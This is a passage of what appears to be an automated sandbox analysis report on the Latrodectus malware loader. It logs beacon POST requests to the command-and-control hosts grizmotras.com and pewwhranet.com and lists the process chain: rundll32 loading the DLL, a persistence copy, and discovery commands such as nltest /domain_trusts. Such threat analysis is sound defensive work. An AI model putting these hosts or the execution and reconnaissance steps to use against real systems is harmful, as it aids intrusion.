                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zl0ytf48F5sj8ZdeOJg3tbGSNPqXT%2FN0AZrJgjXaRJgxI8KCQhzi%2BPGSc%2FfP3dk%2FVAS6EwBkNP6vFcbwwpWfM8iVMJldJciO4six8L2knP89g9U1C2V6iAykmyRzCjamLg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a1f32ce8b3bb-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:23:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                102 | 192.168.2.5 | 49825 | 172.67.219.28 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:16 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                103 | 192.168.2.5 | 49826 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:20 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                104 | 192.168.2.5 | 49827 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:25 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                105 | 192.168.2.5 | 49828 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:29 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                106 | 192.168.2.5 | 49829 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:33 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:37 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:37 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FolGzqUExnXI9hHwPuNboqG8I1mKCbK2AKMd03T8LHdyDr3420y5zdGYrB99964nuERtARoNhCTnymPqx%2FVCrsms%2BBvz21fRZCjpR1G%2BPm0qkGXoYm9Dn5tKepLtggSrzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a27889d4748e-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                107 | 192.168.2.5 | 49830 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:37 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:23:41 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:23:41 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0%2FK%2BFTOb4GVYVf0DK0s4qlbty92eSC3%2FIqZeBmm3es2jI%2BiFUr53JMDWlebdvUNkbH4IDwaVjYCcy5zp7u2emE8dwT0lC3jqTvOCrwhBbDZj9GQKQBbihuV8pV2%2BOAVs%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a291ee847477-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                108 | 192.168.2.5 | 49831 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:42 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                109 | 192.168.2.5 | 49832 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:46 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                110 | 192.168.2.5 | 49833 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:50 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                111 | 192.168.2.5 | 49834 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:55 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                112 | 192.168.2.5 | 49835 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:23:59 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:24:02 UTC | 578 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:24:02 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvxZzYEOi2uY7MR17C8Gw896E2cMikQI%2FpL60RZggvi%2FZRcULsRiaD7M6p6Tctk%2B4ii%2F7RQfJ9ZlFqKKOwCxKMKVDOERgcq84YI3hrQ9C7ih0orAkERAANZqmyQyOyPuCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a3192a6ab3f1-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                113 | 192.168.2.5 | 49836 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:24:03 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                114 | 192.168.2.5 | 49837 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:24:07 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                115 | 192.168.2.5 | 49838 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:24:11 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                116 | 192.168.2.5 | 49839 | 104.21.84.207 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:24:16 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: pewwhranet.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                117 | 192.168.2.5 | 49840 | 104.21.59.82 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:24:20 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
2024-04-26 21:24:24 UTC | 582 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:24:24 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mv4ptAuYdhJ%2B%2BIScx99UaW7tDuXGDTtrwBbI1Xmofl%2FYRhlmCYTMOLz9fYaTfDsPQ3AeBaFjpL5LL%2FJ%2FzoqJvfhoMnnGEZV8fyzNZHxyUXwuJa1ZEDhwMW%2Fkh41yfCvT7Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a39cdea8a518-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
118 | 192.168.2.5 | 49841 | 104.21.59.82 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:24:24 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
2024-04-26 21:24:28 UTC | 576 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:24:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0jut0Mo%2BjVe3VmtELC%2BQZk5AX9PwBvXTPIju12FsAPiRLdVts58toVxvM39D5YBJnyG1vnR2deAbYUqJxwqdlM2jnKr2%2FHcKfy40G3DiMsjmiX1JIB43OhXGL8ZxAc9jog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a9a3b7887367d5-MIA
                                                                                                alt-svc: h3=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port
119 | 192.168.2.5 | 49842 | 104.21.59.82 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:24:28 UTC | 227 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache


                                                                                                Target ID:0
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\loaddll64.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:loaddll64.exe "C:\Users\user\Desktop\360total.dll.dll"
                                                                                                Imagebase:0x7ff6d1030000
                                                                                                File size:165'888 bytes
                                                                                                MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Target ID:1
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:2
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:3
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\360total.dll.dll,CreateObject
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.2270260674.00000146142F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000003.00000002.2270295766.0000014614300000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:4
                                                                                                Start time:23:15:06
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe "C:\Users\user\Desktop\360total.dll.dll",#1
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000004.00000002.2008946508.00000237C16B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000004.00000002.2008986338.00000237C16C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:8
                                                                                                Start time:23:15:07
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_27361bf8.dll", #1
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3416839119.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3502863339.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3367002817.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3124323699.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3178827371.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3440249504.000001E3B56E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3416817098.000001E3B5500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3264216780.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000008.00000003.3041610792.000001E3B5130000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                Target ID:9
                                                                                                Start time:23:15:07
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                                                                                                Imagebase:0x7ff723b80000
                                                                                                File size:570'736 bytes
                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:11
                                                                                                Start time:23:15:10
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\360total.dll.dll,homq
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:12
                                                                                                Start time:23:15:11
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                                                Imagebase:0x7ff715980000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:14
                                                                                                Start time:23:15:11
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1996,i,16797134848863919888,4031310649045437557,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                Imagebase:0x7ff715980000
                                                                                                File size:3'242'272 bytes
                                                                                                MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:15
                                                                                                Start time:23:15:13
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32.exe C:\Users\user\Desktop\360total.dll.dll,RegisterInstallTime
                                                                                                Imagebase:0x7ff7a9eb0000
                                                                                                File size:71'680 bytes
                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:20
                                                                                                Start time:23:15:28
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6200 -s 456
                                                                                                Imagebase:0x7ff723b80000
                                                                                                File size:570'736 bytes
                                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:22
                                                                                                Start time:23:17:19
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c ipconfig /all
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:23
                                                                                                Start time:23:17:19
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                Target ID:24
                                                                                                Start time:23:17:19
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\ipconfig.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:ipconfig /all
                                                                                                Imagebase:0x7ff623390000
                                                                                                File size:35'840 bytes
                                                                                                MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:25
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c systeminfo
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:26
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:27
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\systeminfo.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:systeminfo
                                                                                                Imagebase:0x7ff64d800000
                                                                                                File size:110'080 bytes
                                                                                                MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:29
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                Imagebase:0x7ff6ef0c0000
                                                                                                File size:496'640 bytes
                                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                Target ID:30
                                                                                                Start time:23:17:20
                                                                                                Start date:26/04/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:/c nltest /domain_trusts
                                                                                                Imagebase:0x7ff6a8f90000
                                                                                                File size:289'792 bytes
